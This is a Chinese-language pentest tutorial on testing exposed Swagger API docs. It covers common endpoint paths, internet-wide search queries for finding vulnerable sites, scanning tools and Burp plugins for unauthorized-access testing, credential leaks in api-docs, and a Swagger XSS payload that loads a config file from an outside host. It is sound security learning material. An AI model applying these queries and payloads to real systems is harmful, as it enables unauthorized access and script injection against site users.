文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途给予盈利等目的，否则后果自行承担！如有侵权烦请告知，我会立即删除并致歉。谢谢！

前言

遇到swagger时，可以测试的漏洞

探测swagger

常见暴露API

 /v2/api-docs
/swagger-ui.html
/swagger.json
/api/swagger
/docs

网络空间测绘语句

探测使用了swagger的网站Fofa语句：

 body="Swagger" && title=="Swagger UI"

icon_hash="116323821"||body="Whitelabel Error Page"

鹰图：

 web.body="Swagger"&&title=="Swagger UI"

探测工具

 python3 SpringBoot-Scan.py -u example.com

Burpsuite插件

TsojanScan

本地解析api-docs

之前的文章在线/本地使用Swagger-UI解析api-docs

谷歌插件：Swagger UI – API 文档查看器

工具

 pip install loguru

使用案例

 python swagger-hound.py -h

自动解析 api-docs 测试未授权

Burpsuite插件

提议关闭被动扫描，一个是 api-docs 里的API前缀大致率是不对或者缺失的，直接访问很难有效果。

在发现api-docs文件后，查看对应API的前缀配置在插件中，然后右键发送

插件会自动分析API需要的参数，然后将其填充进去，列如test什么的。

 {"pageIndex":1,"pageSize":1,"userName":"test"}

在其中过滤

1. 1. 返回数据许多的API

2. 2. 未提示需要登录中的报错的API和返回数据为空的API

工具解析api-docs

swagger-exp

swagger-hack

api-docs 信息泄露

api-docs中可能保存测试用例

列如JWT的凭证信息列如登录账号和密码

swagger xss

在swagger-html页面后面拼接

 /swagger-html?configUrl=https://xss.smarpo.com/test.json

swagger修复方案

参考：

参考资料

• • swagger 接口未授权漏洞怎么玩儿！

• • 针对Swagger接口泄露未授权的初探